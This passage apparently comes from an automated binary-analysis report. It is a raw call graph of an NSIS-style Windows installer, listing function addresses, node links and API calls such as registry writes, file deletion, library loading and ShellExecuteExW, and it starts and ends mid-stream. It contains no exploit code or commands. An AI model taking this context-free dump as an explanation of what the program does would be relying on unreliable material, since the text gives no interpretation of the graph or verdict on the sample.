406ce4 GlobalAlloc 3582->3585 3586 406cdb GlobalFree 3582->3586 3583->3584 3584->3581 3584->3582 3585->3581 3585->3582 3586->3585 3588 404001 3587->3588 3609 4065af wsprintfW 3588->3609 3590 404072 3610 4040a6 3590->3610 3592 403da2 3592->3382 3593 404077 3593->3592 3594 4066a5 17 API calls 3593->3594 3594->3593 3595->3378 3613 4064d5 3596->3613 3599 403d73 3599->3377 3599->3379 3600 40656a RegQueryValueExW RegCloseKey 3600->3599 3601->3384 3617 404610 3602->3617 3604 4057e7 3605 404610 SendMessageW 3604->3605 3607 4057f9 OleUninitialize 3605->3607 3606 4057c0 3606->3604 3620 401389 3606->3620 3607->3414 3609->3590 3611 4066a5 17 API calls 3610->3611 3612 4040b4 SetWindowTextW 3611->3612 3612->3593 3614 4064e4 3613->3614 3615 4064e8 3614->3615 3616 4064ed RegOpenKeyExW 3614->3616 3615->3599 3615->3600 3616->3615 3618 404628 3617->3618 3619 404619 SendMessageW 3617->3619 3618->3606 3619->3618 3622 401390 3620->3622 3621 4013fe 3621->3606 3622->3621 3623 4013cb MulDiv SendMessageW 3622->3623 3623->3622 3624->3428 3626 405fff 3625->3626 3628 406011 3625->3628 3627 40600c CharNextW 3626->3627 3626->3628 3630 406035 3627->3630 3629 405f64 CharNextW 3628->3629 3628->3630 3629->3628 3630->3431 3630->3432 3632 4069b4 FindClose 3631->3632 3633 4069bf 3631->3633 3632->3633 3633->3438 3634->3459 3635->3459 3636->3457 3638 406304 GetShortPathNameW 3637->3638 3639 4062de 3637->3639 3640 406423 3638->3640 3641 406319 3638->3641 3664 406158 GetFileAttributesW CreateFileW 3639->3664 3640->3473 3641->3640 3643 406321 wsprintfA 3641->3643 3645 4066a5 17 API calls 3643->3645 3644 4062e8 CloseHandle GetShortPathNameW 3644->3640 3646 4062fc 3644->3646 3647 406349 3645->3647 3646->3638 3646->3640 3665 406158 GetFileAttributesW CreateFileW 3647->3665 3649 406356 3649->3640 3650 406365 GetFileSize GlobalAlloc 3649->3650 3651 406387 3650->3651 3652 40641c CloseHandle 3650->3652 3653 4061db ReadFile 3651->3653 3652->3640 3654 40638f 3653->3654 3654->3652 3666 4060bd lstrlenA 3654->3666 3657 4063a6 lstrcpyA 3660 4063c8 3657->3660 3658 4063ba 3659 4060bd 4 API calls 3658->3659 3659->3660 3661 4063ff SetFilePointer 3660->3661 3662 40620a WriteFile 3661->3662 3663 406415 GlobalFree 3662->3663 3663->3652 3664->3644 3665->3649 3667 4060fe lstrlenA 3666->3667 3668 406106 3667->3668 3669 4060d7 lstrcmpiA 3667->3669 3668->3657 3668->3658 3669->3668 3670 4060f5 CharNextA 3669->3670 3670->3667 3671 401941 3672 401943 3671->3672 3677 402da6 3672->3677 3678 402db2 3677->3678 3679 4066a5 17 API calls 3678->3679 3680 402dd3 3679->3680 3681 401948 3680->3681 3682 4068ef 5 API calls 3680->3682 3683 405d74 3681->3683 3682->3681 3684 40603f 18 API calls 3683->3684 3685 405d94 3684->3685 3686 405d9c DeleteFileW 3685->3686 3687 405db3 3685->3687 3691 401951 3686->3691 3688 405ed3 3687->3688 3719 406668 lstrcpynW 3687->3719 3688->3691 3695 40699e 2 API calls 3688->3695 3690 405dd9 3692 405dec 3690->3692 3693 405ddf lstrcatW 3690->3693 3694 405f83 2 API calls 3692->3694 3696 405df2 3693->3696 3694->3696 3698 405ef8 3695->3698 3697 405e02 lstrcatW 3696->3697 3699 405e0d lstrlenW FindFirstFileW 3696->3699 3697->3699 3698->3691 3700 405f37 3 API calls 3698->3700 3699->3688 3717 405e2f 3699->3717 3701 405f02 3700->3701 3703 405d2c 5 API calls 3701->3703 3702 405eb6 FindNextFileW 3706 405ecc FindClose 3702->3706 3702->3717 3705 405f0e 3703->3705 3707 405f12 3705->3707 3708 405f28 3705->3708 3706->3688 3707->3691 3711 4056ca 24 API calls 3707->3711 3710 4056ca 24 API calls 3708->3710 3710->3691 3713 405f1f 3711->3713 3712 405d74 60 API calls 3712->3717 3715 406428 36 API calls 3713->3715 3714 4056ca 24 API calls 3714->3702 3715->3691 3716 4056ca 24 API calls 3716->3717 3717->3702 3717->3712 3717->3714 3717->3716 3718 406428 36 API calls 3717->3718 3720 406668 lstrcpynW 3717->3720 3721 405d2c 3717->3721 3718->3717 3719->3690 3720->3717 3729 406133 GetFileAttributesW 3721->3729 3724 405d47 RemoveDirectoryW 3727 405d55 3724->3727 3725 405d4f DeleteFileW 3725->3727 3726 405d59 3726->3717 3727->3726 3728 405d65 SetFileAttributesW 3727->3728 3728->3726 3730 405d38 3729->3730 3731 406145 SetFileAttributesW 3729->3731 3730->3724 3730->3725 3730->3726 3731->3730 3732 4015c1 3733 402da6 17 API calls 3732->3733 3734 4015c8 3733->3734 3735 405fe2 4 API calls 3734->3735 3747 4015d1 3735->3747 3736 401631 3737 401663 3736->3737 3738 401636 3736->3738 3742 401423 24 API calls 3737->3742 3751 401423 3738->3751 3739 405f64 CharNextW 3739->3747 3748 40165b 3742->3748 3744 405c16 2 API calls 3744->3747 3745 405c33 5 API calls 3745->3747 3746 40164a SetCurrentDirectoryW 3746->3748 3747->3736 3747->3739 3747->3744 3747->3745 3749 401617 GetFileAttributesW 3747->3749 3750 405b99 4 API calls 3747->3750 3749->3747 3750->3747 3752 4056ca 24 API calls 3751->3752 3753 401431 3752->3753 3754 406668 lstrcpynW 3753->3754 3754->3746 3935 401c43 3957 402d84 3935->3957 3937 401c4a 3938 402d84 17 API calls 3937->3938 3939 401c57 3938->3939 3940 402da6 17 API calls 3939->3940 3941 401c6c 3939->3941 3940->3941 3942 401c7c 3941->3942 3943 402da6 17 API calls 3941->3943 3944 401cd3 3942->3944 3945 401c87 3942->3945 3943->3942 3947 402da6 17 API calls 3944->3947 3946 402d84 17 API calls 3945->3946 3949 401c8c 3946->3949 3948 401cd8 3947->3948 3950 402da6 17 API calls 3948->3950 3951 402d84 17 API calls 3949->3951 3952 401ce1 FindWindowExW 3950->3952 3953 401c98 3951->3953 3956 401d03 3952->3956 3954 401cc3 SendMessageW 3953->3954 3955 401ca5 SendMessageTimeoutW 3953->3955 3954->3956 3955->3956 3958 4066a5 17 API calls 3957->3958 3959 402d99 3958->3959 3959->3937 3967 4028c4 3968 4028ca 3967->3968 3969 4028d2 FindClose 3968->3969 3970 402c2a 3968->3970 3969->3970 3776 4040c5 3777 4040dd 3776->3777 3778 40423e 3776->3778 3777->3778 3779 4040e9 3777->3779 3780 40424f GetDlgItem GetDlgItem 3778->3780 3785 40428f 3778->3785 3782 4040f4 SetWindowPos 3779->3782 3783 404107 3779->3783 3852 4045c4 3780->3852 3781 4042e9 3786 404610 SendMessageW 3781->3786 3794 404239 3781->3794 3782->3783 3787 404110 ShowWindow 3783->3787 3788 404152 3783->3788 3785->3781 3793 401389 2 API calls 3785->3793 3817 4042fb 3786->3817 3795 404130 GetWindowLongW 3787->3795 3796 40422b 3787->3796 3790 404171 3788->3790 3791 40415a DestroyWindow 3788->3791 3789 404279 KiUserCallbackDispatcher 3792 40140b 2 API calls 3789->3792 3798 404176 SetWindowLongW 3790->3798 3799 404187 3790->3799 3797 40456e 3791->3797 3792->3785 3800 4042c1 3793->3800 3795->3796 3802 404149 ShowWindow 3795->3802 3858 40462b 3796->3858 3797->3794 3809 40457e ShowWindow 3797->3809 3798->3794 3799->3796 3803 404193 GetDlgItem 3799->3803 3800->3781 3804 4042c5 SendMessageW 3800->3804 3802->3788 3807 4041c1 3803->3807 3808 4041a4 SendMessageW IsWindowEnabled 3803->3808 3804->3794 3805 40140b 2 API calls 3805->3817 3806 40454f DestroyWindow EndDialog 3806->3797 3811 4041ce 3807->3811 3814 404215 SendMessageW 3807->3814 3815 4041e1 3807->3815 3823 4041c6 3807->3823 3808->3794 3808->3807 3809->3794 3810 4066a5 17 API calls 3810->3817 3811->3814 3811->3823 3813 4045c4 18 API calls 3813->3817 3814->3796 3818 4041e9 3815->3818 3819 4041fe 3815->3819 3816 4041fc 3816->3796 3817->3805 3817->3806 3817->3810 3817->3813 3824 4045c4 18 API calls 3817->3824 3821 40140b 2 API calls 3818->3821 3820 40140b 2 API calls 3819->3820 3822 404205 3820->3822 3821->3823 3822->3796 3822->3823 3855 40459d 3823->3855 3825 404376 GetDlgItem 3824->3825 3826 404393 ShowWindow EnableWindow 3825->3826 3827 40438b 3825->3827 3872 4045e6 EnableWindow 3826->3872 3827->3826 3829 4043bd EnableWindow 3834 4043d1 3829->3834 3830 4043d6 GetSystemMenu EnableMenuItem SendMessageW 3831 404406 SendMessageW 3830->3831 3830->3834 3831->3834 3833 4040a6 18 API calls 3833->3834 3834->3830 3834->3833 3873 4045f9 SendMessageW 3834->3873 3874 406668 lstrcpynW 3834->3874 3836 404435 lstrlenW 3837 4066a5 17 API calls 3836->3837 3838 40444b SetWindowTextW 3837->3838 3839 401389 2 API calls 3838->3839 3840 40445c 3839->3840 3840->3794 3840->3817 3841 40448f DestroyWindow 3840->3841 3843 40448a 3840->3843 3841->3797 3842 4044a9 CreateDialogParamW 3841->3842 3842->3797 3844 4044dc 3842->3844 3843->3794 3845 4045c4 18 API calls 3844->3845 3846 4044e7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3845->3846 3847 401389 2 API calls 3846->3847 3848 40452d 3847->3848 3848->3794 3849 404535 ShowWindow 3848->3849 3850 404610 SendMessageW 3849->3850 3851 40454d 3850->3851 3851->3797 3853 4066a5 17 API calls 3852->3853 3854 4045cf SetDlgItemTextW 3853->3854 3854->3789 3856 4045a4 3855->3856 3857 4045aa SendMessageW 3855->3857 3856->3857 3857->3816 3859 4046ee 3858->3859 3860 404643 GetWindowLongW 3858->3860 3859->3794 3860->3859 3861 404658 3860->3861 3861->3859 3862 404685 GetSysColor 3861->3862 3863 404688 3861->3863 3862->3863 3864 404698 SetBkMode 3863->3864 3865 40468e SetTextColor 3863->3865 3866 4046b0 GetSysColor 3864->3866 3867 4046b6 3864->3867 3865->3864 3866->3867 3868 4046c7 3867->3868 3869 4046bd SetBkColor 3867->3869 3868->3859 3870 4046e1 CreateBrushIndirect 3868->3870 3871 4046da DeleteObject 3868->3871 3869->3868 3870->3859 3871->3870 3872->3829 3873->3834 3874->3836 3974 4016cc 3975 402da6 17 API calls 3974->3975 3976 4016d2 GetFullPathNameW 3975->3976 3977 4016ec 3976->3977 3983 40170e 3976->3983 3979 40699e 2 API calls 3977->3979 3977->3983 3978 401723 GetShortPathNameW 3980 402c2a 3978->3980 3981 4016fe 3979->3981 3981->3983 3984 406668 lstrcpynW 3981->3984 3983->3978 3983->3980 3984->3983 3985 401e4e GetDC 3986 402d84 17 API calls 3985->3986 3987 401e60 GetDeviceCaps MulDiv ReleaseDC 3986->3987 3988 402d84 17 API calls 3987->3988 3989 401e91 3988->3989 3990 4066a5 17 API calls 3989->3990 3991 401ece CreateFontIndirectW 3990->3991 3992 402638 3991->3992 3992->3992 3993 402950 3994 402da6 17 API calls 3993->3994 3996 40295c 3994->3996 3995 402972 3998 406133 2 API calls 3995->3998 3996->3995 3997 402da6 17 API calls 3996->3997 3997->3995 3999 402978 3998->3999 4021 406158 GetFileAttributesW CreateFileW 3999->4021 4001 402985 4002 402a3b 4001->4002 4003 4029a0 GlobalAlloc 4001->4003 4004 402a23 4001->4004 4005 402a42 DeleteFileW 4002->4005 4006 402a55 4002->4006 4003->4004 4007 4029b9 4003->4007 4008 403371 44 API calls 4004->4008 4005->4006 4022 4035f8 SetFilePointer 4007->4022 4010 402a30 CloseHandle 4008->4010 4010->4002 4011 4029bf 4012 4035e2 ReadFile 4011->4012 4013 4029c8 GlobalAlloc 4012->4013 4014 4029d8 4013->4014 4015 402a0c 4013->4015 4016 403371 44 API calls 4014->4016 4017 40620a WriteFile 4015->4017 4020 4029e5 4016->4020 4018 402a18 GlobalFree 4017->4018 4018->4004 4019 402a03 GlobalFree 4019->4015 4020->4019 4021->4001 4022->4011 4030 403cd5 4031 403ce0 4030->4031 4032 403ce4 4031->4032 4033 403ce7 GlobalAlloc 4031->4033 4033->4032 4034 401956 4035 402da6 17 API calls 4034->4035 4036 40195d lstrlenW 4035->4036 4037 402638 4036->4037 4038 4014d7 4039 402d84 17 API calls 4038->4039 4040 4014dd Sleep 4039->4040 4042 402c2a 4040->4042 4043 4020d8 4044 4020ea 4043->4044 4054 40219c 4043->4054 4045 402da6 17 API calls 4044->4045 4046 4020f1 4045->4046 4048 402da6 17 API calls 4046->4048 4047 401423 24 API calls 4050 4022f6 4047->4050 4049 4020fa 4048->4049 4051 402110 LoadLibraryExW 4049->4051 4052 402102 GetModuleHandleW 4049->4052 4053 402121 4051->4053 4051->4054 4052->4051 4052->4053 4063 406aa4 4053->4063 4054->4047 4057 402132 4060 401423 24 API calls 4057->4060 4061 402142 4057->4061 4058 40216b 4059 4056ca 24 API calls 4058->4059 4059->4061 4060->4061 4061->4050 4062 40218e FreeLibrary 4061->4062 4062->4050 4068 40668a WideCharToMultiByte 4063->4068 4065 406ac1 4066 406ac8 GetProcAddress 4065->4066 4067 40212c 4065->4067 4066->4067 4067->4057 4067->4058 4068->4065 4069 402b59 4070 402b60 4069->4070 4071 402bab 4069->4071 4073 402ba9 4070->4073 4075 402d84 17 API calls 4070->4075 4072 406a35 5 API calls 4071->4072 4074 402bb2 4072->4074 4076 402da6 17 API calls 4074->4076 4077 402b6e 4075->4077 4078 402bbb 4076->4078 4079 402d84 17 API calls 4077->4079 4078->4073 4080 402bbf IIDFromString 4078->4080 4082 402b7a 4079->4082 4080->4073 4081 402bce 4080->4081 4081->4073 4087 406668 lstrcpynW 4081->4087 4086 4065af wsprintfW 4082->4086 4085 402beb CoTaskMemFree 4085->4073 4086->4073 4087->4085 4088 402a5b 4089 402d84 17 API calls 4088->4089 4090 402a61 4089->4090 4091 402aa4 4090->4091 4092 402a88 4090->4092 4097 40292e 4090->4097 4094 402abe 4091->4094 4095 402aae 4091->4095 4093 402a8d 4092->4093 4101 402a9e 4092->4101 4102 406668 lstrcpynW 4093->4102 4096 4066a5 17 API calls 4094->4096 4098 402d84 17 API calls 4095->4098 4096->4101 4098->4101 4101->4097 4103 4065af wsprintfW 4101->4103 4102->4097 4103->4097 3888 40175c 3889 402da6 17 API calls 3888->3889 3890 401763 3889->3890 3891 406187 2 API calls 3890->3891 3892 40176a 3891->3892 3893 406187 2 API calls 3892->3893 3893->3892 4104 401d5d 4105 402d84 17 API calls 4104->4105 4106 401d6e SetWindowLongW 4105->4106 4107 402c2a 4106->4107 4108 4028de 4109 4028e6 4108->4109 4110 4028ea FindNextFileW 4109->4110 4112 4028fc 4109->4112 4111 402943 4110->4111 4110->4112 4114 406668 lstrcpynW 4111->4114 4114->4112 4115 406d5f 4121 406be3 4115->4121 4116 40754e 4117 406c64 GlobalFree 4118 406c6d GlobalAlloc 4117->4118 4118->4116 4118->4121 4119 406ce4 GlobalAlloc 4119->4116 4119->4121 4120 406cdb GlobalFree 4120->4119 4121->4116 4121->4117 4121->4118 4121->4119 4121->4120 4122 401563 4123 402ba4 4122->4123 4126 4065af wsprintfW 4123->4126 4125 402ba9 4126->4125 4127 401968 4128 402d84 17 API calls 4127->4128 4129 40196f 4128->4129 4130 402d84 17 API calls 4129->4130 4131 40197c 4130->4131 4132 402da6 17 API calls 4131->4132 4133 401993 lstrlenW 4132->4133 4135 4019a4 4133->4135 4134 4019e5 4135->4134 4139 406668 lstrcpynW 4135->4139 4137 4019d5 4137->4134 4138 4019da lstrlenW 4137->4138 4138->4134 4139->4137 4147 40166a 4148 402da6 17 API calls 4147->4148 4149 401670 4148->4149 4150 40699e 2 API calls 4149->4150 4151 401676 4150->4151 4152 402aeb 4153 402d84 17 API calls 4152->4153 4154 402af1 4153->4154 4155 4066a5 17 API calls 4154->4155 4156 40292e 4154->4156 4155->4156 4157 4026ec 4158 402d84 17 API calls 4157->4158 4159 4026fb 4158->4159 4160 402745 ReadFile 4159->4160 4161 4061db ReadFile 4159->4161 4163 402785 MultiByteToWideChar 4159->4163 4164 40283a 4159->4164 4166 4027ab SetFilePointer MultiByteToWideChar 4159->4166 4167 40284b 4159->4167 4169 402838 4159->4169 4170 406239 SetFilePointer 4159->4170 4160->4159 4160->4169 4161->4159 4163->4159 4179 4065af wsprintfW 4164->4179 4166->4159 4168 40286c SetFilePointer 4167->4168 4167->4169 4168->4169 4171 406255 4170->4171 4174 40626d 4170->4174 4172 4061db ReadFile 4171->4172 4173 406261 4172->4173 4173->4174 4175 406276 SetFilePointer 4173->4175 4176 40629e SetFilePointer 4173->4176 4174->4159 4175->4176 4177 406281 4175->4177 4176->4174 4178 40620a WriteFile 4177->4178 4178->4174 4179->4169 4180 404a6e 4181 404aa4 4180->4181 4182 404a7e 4180->4182 4184 40462b 8 API calls 4181->4184 4183 4045c4 18 API calls 4182->4183 4185 404a8b SetDlgItemTextW 4183->4185 4186 404ab0 4184->4186 4185->4181 3894 40176f 3895 402da6 17 API calls 3894->3895 3896 401776 3895->3896 3897 401796 3896->3897 3898 40179e 3896->3898 3933 406668 lstrcpynW 3897->3933 3934 406668 lstrcpynW 3898->3934 3901 40179c 3905 4068ef 5 API calls 3901->3905 3902 4017a9 3903 405f37 3 API calls 3902->3903 3904 4017af lstrcatW 3903->3904 3904->3901 3925 4017bb 3905->3925 3906 40699e 2 API calls 3906->3925 3907 406133 2 API calls 3907->3925 3909 4017cd CompareFileTime 3909->3925 3910 40188d 3912 4056ca 24 API calls 3910->3912 3911 401864 3913 4056ca 24 API calls 3911->3913 3921 401879 3911->3921 3914 401897 3912->3914 3913->3921 3915 403371 44 API calls 3914->3915 3916 4018aa 3915->3916 3917 4018be SetFileTime 3916->3917 3918 4018d0 FindCloseChangeNotification 3916->3918 3917->3918 3920 4018e1 3918->3920 3918->3921 3919 4066a5 17 API calls 3919->3925 3923 4018e6 3920->3923 3924 4018f9 3920->3924 3922 406668 lstrcpynW 3922->3925 3926 4066a5 17 API calls 3923->3926 3927 4066a5 17 API calls 3924->3927 3925->3906 3925->3907 3925->3909 3925->3910 3925->3911 3925->3919 3925->3922 3928 405cc8 MessageBoxIndirectW 3925->3928 3932 406158 GetFileAttributesW CreateFileW 3925->3932 3929 4018ee lstrcatW 3926->3929 3930 401901 3927->3930 3928->3925 3929->3930 3931 405cc8 MessageBoxIndirectW 3930->3931 3931->3921 3932->3925 3933->3901 3934->3902 4187 401a72 4188 402d84 17 API calls 4187->4188 4189 401a7b 4188->4189 4190 402d84 17 API calls 4189->4190 4191 401a20 4190->4191 4192 401573 4193 401583 ShowWindow 4192->4193 4194 40158c 4192->4194 4193->4194 4195 402c2a 4194->4195 4196 40159a ShowWindow 4194->4196 4196->4195 4197 4023f4 4198 402da6 17 API calls 4197->4198 4199 402403 4198->4199 4200 402da6 17 API calls 4199->4200 4201 40240c 4200->4201 4202 402da6 17 API calls 4201->4202 4203 402416 GetPrivateProfileStringW 4202->4203 4204 4014f5 SetForegroundWindow 4205 402c2a 4204->4205 4206 401ff6 4207 402da6 17 API calls 4206->4207 4208 401ffd 4207->4208 4209 40699e 2 API calls 4208->4209 4210 402003 4209->4210 4212 402014 4210->4212 4213 4065af wsprintfW 4210->4213 4213->4212 4214 401b77 4215 402da6 17 API calls 4214->4215 4216 401b7e 4215->4216 4217 402d84 17 API calls 4216->4217 4218 401b87 wsprintfW 4217->4218 4219 402c2a 4218->4219 4220 4046fa lstrcpynW lstrlenW 4221 40167b 4222 402da6 17 API calls 4221->4222 4223 401682 4222->4223 4224 402da6 17 API calls 4223->4224 4225 40168b 4224->4225 4226 402da6 17 API calls 4225->4226 4227 401694 MoveFileW 4226->4227 4228 4016a0 4227->4228 4229 4016a7 4227->4229 4231 401423 24 API calls 4228->4231 4230 40699e 2 API calls 4229->4230 4233 4022f6 4229->4233 4232 4016b6 4230->4232 4231->4233 4232->4233 4234 406428 36 API calls 4232->4234 4234->4228 4242 4019ff 4243 402da6 17 API calls 4242->4243 4244 401a06 4243->4244 4245 402da6 17 API calls 4244->4245 4246 401a0f 4245->4246 4247 401a16 lstrcmpiW 4246->4247 4248 401a28 lstrcmpW 4246->4248 4249 401a1c 4247->4249 4248->4249 4250 4022ff 4251 402da6 17 API calls 4250->4251 4252 402305 4251->4252 4253 402da6 17 API calls 4252->4253 4254 40230e 4253->4254 4255 402da6 17 API calls 4254->4255 4256 402317 4255->4256 4257 40699e 2 API calls 4256->4257 4258 402320 4257->4258 4259 402331 lstrlenW lstrlenW 4258->4259 4260 402324 4258->4260 4262 4056ca 24 API calls 4259->4262 4261 4056ca 24 API calls 4260->4261 4264 40232c 4260->4264 4261->4264 4263 40236f SHFileOperationW 4262->4263 4263->4260 4263->4264 4265 401000 4266 401037 BeginPaint GetClientRect 4265->4266 4267 40100c DefWindowProcW 4265->4267 4269 4010f3 4266->4269 4270 401179 4267->4270 4271 401073 CreateBrushIndirect FillRect DeleteObject 4269->4271 4272 4010fc 4269->4272 4271->4269 4273 401102 CreateFontIndirectW 4272->4273 4274 401167 EndPaint 4272->4274 4273->4274 4275 401112 6 API calls 4273->4275 4274->4270 4275->4274 4276 401d81 4277 401d94 GetDlgItem 4276->4277 4278 401d87 4276->4278 4280 401d8e 4277->4280 4279 402d84 17 API calls 4278->4279 4279->4280 4281 401dd5 GetClientRect LoadImageW SendMessageW 4280->4281 4283 402da6 17 API calls 4280->4283 4284 401e33 4281->4284 4286 401e3f 4281->4286 4283->4281 4285 401e38 DeleteObject 4284->4285 4284->4286 4285->4286 4287 401503 4288 40150b 4287->4288 4290 40151e 4287->4290 4289 402d84 17 API calls 4288->4289 4289->4290 4291 404783 4292 40479b 4291->4292 4296 4048b5 4291->4296 4297 4045c4 18 API calls 4292->4297 4293 40491f 4294 4049e9 4293->4294 4295 404929 GetDlgItem 4293->4295 4302 40462b 8 API calls 4294->4302 4298 404943 4295->4298 4299 4049aa 4295->4299 4296->4293 4296->4294 4300 4048f0 GetDlgItem SendMessageW 4296->4300 4301 404802 4297->4301 4298->4299 4307 404969 SendMessageW LoadCursorW SetCursor 4298->4307 4299->4294 4303 4049bc 4299->4303 4324 4045e6 EnableWindow 4300->4324 4305 4045c4 18 API calls 4301->4305 4306 4049e4 4302->4306 4308 4049d2 4303->4308 4309 4049c2 SendMessageW 4303->4309 4311 40480f CheckDlgButton 4305->4311 4328 404a32 4307->4328 4308->4306 4314 4049d8 SendMessageW 4308->4314 4309->4308 4310 40491a 4325 404a0e 4310->4325 4322 4045e6 EnableWindow 4311->4322 4314->4306 4317 40482d GetDlgItem 4323 4045f9 SendMessageW 4317->4323 4319 404843 SendMessageW 4320 404860 GetSysColor 4319->4320 4321 404869 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4319->4321 4320->4321 4321->4306 4322->4317 4323->4319 4324->4310 4326 404a21 SendMessageW 4325->4326 4327 404a1c 4325->4327 4326->4293 4327->4326 4331 405c8e ShellExecuteExW 4328->4331 4330 404998 LoadCursorW SetCursor 4330->4299 4331->4330 4332 402383 4333 40238a 4332->4333 4336 40239d 4332->4336 4334 4066a5 17 API calls 4333->4334 4335 402397 4334->4335 4337 405cc8 MessageBoxIndirectW 4335->4337 4337->4336 4338 402c05 SendMessageW 4339 402c2a 4338->4339 4340 402c1f InvalidateRect 4338->4340 4340->4339 4341 405809 4342 4059b3 4341->4342 4343 40582a GetDlgItem GetDlgItem GetDlgItem 4341->4343 4345 4059e4 4342->4345 4346 4059bc GetDlgItem CreateThread CloseHandle 4342->4346 4386 4045f9 SendMessageW 4343->4386 4348 405a0f 4345->4348 4349 405a34 4345->4349 4350 4059fb ShowWindow ShowWindow 4345->4350 4346->4345 4347 40589a 4352 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4347->4352 4351 405a6f 4348->4351 4354 405a23 4348->4354 4355 405a49 ShowWindow 4348->4355 4356 40462b 8 API calls 4349->4356 4388 4045f9 SendMessageW 4350->4388 4351->4349 4361 405a7d SendMessageW 4351->4361 4359 4058f3 SendMessageW SendMessageW 4352->4359 4360 40590f 4352->4360 4362 40459d SendMessageW 4354->4362 4357 405a69 4355->4357 4358 405a5b 4355->4358 4367 405a42 4356->4367 4364 40459d SendMessageW 4357->4364 4363 4056ca 24 API calls 4358->4363 4359->4360 4365 405922 4360->4365 4366 405914 SendMessageW 4360->4366 4361->4367 4368 405a96 CreatePopupMenu 4361->4368 4362->4349 4363->4357 4364->4351 4370 4045c4 18 API calls 4365->4370 4366->4365 4369 4066a5 17 API calls 4368->4369 4371 405aa6 AppendMenuW 4369->4371 4372 405932 4370->4372 4373 405ac3 GetWindowRect 4371->4373 4374 405ad6 TrackPopupMenu 4371->4374 4375 40593b ShowWindow 4372->4375 4376 40596f GetDlgItem SendMessageW 4372->4376 4373->4374 4374->4367 4378 405af1 4374->4378 4379 405951 ShowWindow 4375->4379 4380 40595e 4375->4380 4376->4367 4377 405996 SendMessageW SendMessageW 4376->4377 4377->4367 4381 405b0d SendMessageW 4378->4381 4379->4380 4387 4045f9 SendMessageW 4380->4387 4381->4381 4382 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4381->4382 4384 405b4f SendMessageW 4382->4384 4384->4384 4385 405b78 GlobalUnlock SetClipboardData CloseClipboard 4384->4385 4385->4367 4386->4347 4387->4376 4388->4348 4389 40248a 4390 402da6 17 API calls 4389->4390 4391 40249c 4390->4391 4392 402da6 17 API calls 4391->4392 4393 4024a6 4392->4393 4406 402e36 4393->4406 4396 40292e 4397 4024de 4399 4024ea 4397->4399 4402 402d84 17 API calls 4397->4402 4398 402da6 17 API calls 4401 4024d4 lstrlenW 4398->4401 4400 402509 RegSetValueExW 4399->4400 4403 403371 44 API calls 4399->4403 4404 40251f RegCloseKey 4400->4404 4401->4397 4402->4399 4403->4400 4404->4396 4407 402e51 4406->4407 4410 406503 4407->4410 4411 406512 4410->4411 4412 4024b6 4411->4412 4413 40651d RegCreateKeyExW 4411->4413 4412->4396 4412->4397 4412->4398 4413->4412 4414 404e0b 4415 404e37 4414->4415 4416 404e1b 4414->4416 4418 404e6a 4415->4418 4419 404e3d SHGetPathFromIDListW 4415->4419 4425 405cac GetDlgItemTextW 4416->4425 4420 404e54 SendMessageW 4419->4420 4421 404e4d 4419->4421 4420->4418 4423 40140b 2 API calls 4421->4423 4422 404e28 SendMessageW 4422->4415 4423->4420 4425->4422 4426 40290b 4427 402da6 17 API calls 4426->4427 4428 402912 FindFirstFileW 4427->4428 4429 40293a 4428->4429 4433 402925 4428->4433 4434 4065af wsprintfW 4429->4434 4431 402943 4435 406668 lstrcpynW 4431->4435 4434->4431 4435->4433 4436 40190c 4437 401943 4436->4437 4438 402da6 17 API calls 4437->4438 4439 401948 4438->4439 4440 405d74 67 API calls 4439->4440 4441 401951 4440->4441 4442 40190f 4443 402da6 17 API calls 4442->4443 4444 401916 4443->4444 4445 405cc8 MessageBoxIndirectW 4444->4445 4446 40191f 4445->4446 4447 401491 4448 4056ca 24 API calls 4447->4448 4449 401498 4448->4449 4450 402891 4451 402898 4450->4451 4452 402ba9 4450->4452 4453 402d84 17 API calls 4451->4453 4454 40289f 4453->4454 4455 4028ae SetFilePointer 4454->4455 4455->4452 4456 4028be 4455->4456 4458 4065af wsprintfW 4456->4458 4458->4452 4459 401f12 4460 402da6 17 API calls 4459->4460 4461 401f18 4460->4461 4462 402da6 17 API calls 4461->4462 4463 401f21 4462->4463 4464 402da6 17 API calls 4463->4464 4465 401f2a 4464->4465 4466 402da6 17 API calls 4465->4466 4467 401f33 4466->4467 4468 401423 24 API calls 4467->4468 4469 401f3a 4468->4469 4476 405c8e ShellExecuteExW 4469->4476 4471 401f82 4472 406ae0 5 API calls 4471->4472 4474 40292e 4471->4474 4473 401f9f CloseHandle 4472->4473 4473->4474 4476->4471 4477 402f93 4478 402fa5 SetTimer 4477->4478 4479 402fbe 4477->4479 4478->4479 4480 40300c 4479->4480 4481 403012 MulDiv 4479->4481 4482 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4481->4482 4482->4480 4498 401d17 4499 402d84 17 API calls 4498->4499 4500 401d1d IsWindow 4499->4500 4501 401a20 4500->4501 4502 401b9b 4503 401ba8 4502->4503 4504 401bec 4502->4504 4511 401bbf 4503->4511 4513 401c31 4503->4513 4505 401bf1 4504->4505 4506 401c16 GlobalAlloc 4504->4506 4510 40239d 4505->4510 4523 406668 lstrcpynW 4505->4523 4508 4066a5 17 API calls 4506->4508 4507 4066a5 17 API calls 4509 402397 4507->4509 4508->4513 4517 405cc8 MessageBoxIndirectW 4509->4517 4521 406668 lstrcpynW 4511->4521 4513->4507 4513->4510 4515 401c03 GlobalFree 4515->4510 4516 401bce 4522 406668 lstrcpynW 4516->4522 4517->4510 4519 401bdd 4524 406668 lstrcpynW 4519->4524 4521->4516 4522->4519 4523->4515 4524->4510 4525 40261c 4526 402da6 17 API calls 4525->4526 4527 402623 4526->4527 4530 406158 GetFileAttributesW CreateFileW 4527->4530 4529 40262f 4530->4529 4538 40149e 4539 4014ac PostQuitMessage 4538->4539 4540 40239d 4538->4540 4539->4540 4541 40259e 4551 402de6 4541->4551 4544 402d84 17 API calls 4545 4025b1 4544->4545 4546 4025d9 RegEnumValueW 4545->4546 4547 4025cd RegEnumKeyW 4545->4547 4549 40292e 4545->4549 4548 4025ee RegCloseKey 4546->4548 4547->4548 4548->4549 4552 402da6 17 API calls 4551->4552 4553 402dfd 4552->4553 4554 4064d5 RegOpenKeyExW 4553->4554 4555 4025a8 4554->4555 4555->4544 4556 4015a3 4557 402da6 17 API calls 4556->4557 4558 4015aa SetFileAttributesW 4557->4558 4559 4015bc 4558->4559 3755 401fa4 3756 402da6 17 API calls 3755->3756 3757 401faa 3756->3757 3758 4056ca 24 API calls 3757->3758 3759 401fb4 3758->3759 3760 405c4b 2 API calls 